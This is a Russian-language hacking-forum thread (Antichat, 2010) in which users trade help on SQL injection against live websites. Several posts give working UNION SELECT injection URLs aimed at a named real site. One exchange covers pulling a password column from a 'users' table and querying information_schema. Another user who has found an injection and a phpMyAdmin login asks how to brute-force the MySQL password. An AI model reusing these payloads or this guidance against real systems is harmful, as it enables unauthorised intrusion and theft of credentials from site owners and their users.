HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14501  
Старый 22.07.2010, 21:30
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от IMMORTAL_S  
Объясните "что делает" эта запись
rand(0)|0
?? ну в смысле, для чего нужна вертикальная черта?
Цитата:
Сообщение от MySQL.ru  
RAND()
RAND()
RAND(N)
Возвращает случайную величину с плавающей точкой в диапазоне от 0 до 1,0. Если целочисленный аргумент N указан, то он используется как начальное значение этой величины
Как-то так
 
Ответить с цитированием

  #14502  
Старый 22.07.2010, 21:48
Yetisports
Участник форума
Регистрация: 11.07.2010
Сообщений: 147
С нами: 8335766

Репутация: 17
По умолчанию

почему не показать номер?

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+

http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
 
Ответить с цитированием

  #14503  
Старый 22.07.2010, 21:50
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Yetisports  
почему не показать номер?
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/brandproductlist.php?brandid=-9999 and 1=0 UNION SELECT 1,2,3,4+--+
http://www.ofisdubai.com/newsletterContent.php?id=-9+union+select+1,2,3,4,5

=\

/showthread.php?p=2254732
 
Ответить с цитированием

  #14504  
Старый 22.07.2010, 21:51
IMMORTAL_S
Новичок
Регистрация: 29.04.2010
Сообщений: 19
С нами: 8440113

Репутация: 3
По умолчанию

Спасибо конечно.. про rand я знаю а вот для чего |0 непонял
 
Ответить с цитированием

  #14505  
Старый 22.07.2010, 22:05
bogdan
Новичок
Регистрация: 25.06.2010
Сообщений: 17
С нами: 8358806

Репутация: 0
По умолчанию

есть таблица users

table_rows - 6

есть колонки name,pass

когда делаю запрос union+select+......version()+from+users то все нормально

а запрос union+select+......pass+from+users ничего не выдает

что посоветуете?
 
Ответить с цитированием

  #14506  
Старый 22.07.2010, 22:13
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

Цитата:
Сообщение от IMMORTAL_S  
Спасибо конечно.. про rand я знаю
а вот для чего
|0
непонял
Это операция Побитового "ИЛИ".

Пример:

Код:
mysql> SELECT 29 | 15;
+---------+
| 29 | 15 |
+---------+
|      31 |
+---------+
1 row in set (0.00 sec)

mysql> SELECT 5|9;
+-----+
| 5|9 |
+-----+
|  13 |
+-----+
1 row in set (0.01 sec)

mysql> SELECT 2|96;
+------+
| 2|96 |
+------+
|   98 |
+------+
1 row in set (0.00 sec)

mysql> SELECT 7|5;
+-----+
| 7|5 |
+-----+
|   7 |
+-----+
1 row in set (0.00 sec)
Можешь сверить по калькулятору(кнопка OR).
 
Ответить с цитированием

  #14507  
Старый 22.07.2010, 22:28
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

Цитата:
Сообщение от bogdan  
есть таблица users
table_rows - 6
есть колонки name,pass
когда делаю запрос union+select+......version()+from+users то все нормально
а запрос union+select+......pass+from+users ничего не выдает
что посоветуете?
Возможно луна в другой фазе.

Код:
UNION SELECT ...DATABASE() FROM USERS
Код:
UNION SELECT ...TABLE_SCHEMA FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME = 'users'
Вполне вероятно, что базы разные.
 
Ответить с цитированием

  #14508  
Старый 22.07.2010, 22:51
Anexroid
Новичок
Регистрация: 22.08.2009
Сообщений: 7
С нами: 8800024

Репутация: 1
По умолчанию

Нашел SQL-Inj

Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
 
Ответить с цитированием

  #14509  
Старый 22.07.2010, 23:05
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами: 9642449

Репутация: 606


По умолчанию

Цитата:
Сообщение от Anexroid  
Нашел SQL-Inj
Можно ли сбрутить пароль пользователя MySQL? (MySQL v 4.3) Имя пользователя и БД - знаю.
1. Зависит от сервера базы данных - если есть доступ к ней извне или с того же сервера, то можно пробовать брутить.

2. Если ситуация удовлетворяет первому условию, и ты начал брутить, то успех будет зависить от сложности пароля.
 
Ответить с цитированием

  #14510  
Старый 22.07.2010, 23:06
Anexroid
Новичок
Регистрация: 22.08.2009
Сообщений: 7
С нами: 8800024

Репутация: 1
По умолчанию

Да, нашел вход в phpmyadmin. Имя пользователя знаю.

Авторизация через .htaccess

Вопрос номер 2:

При помощи чего брутить?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.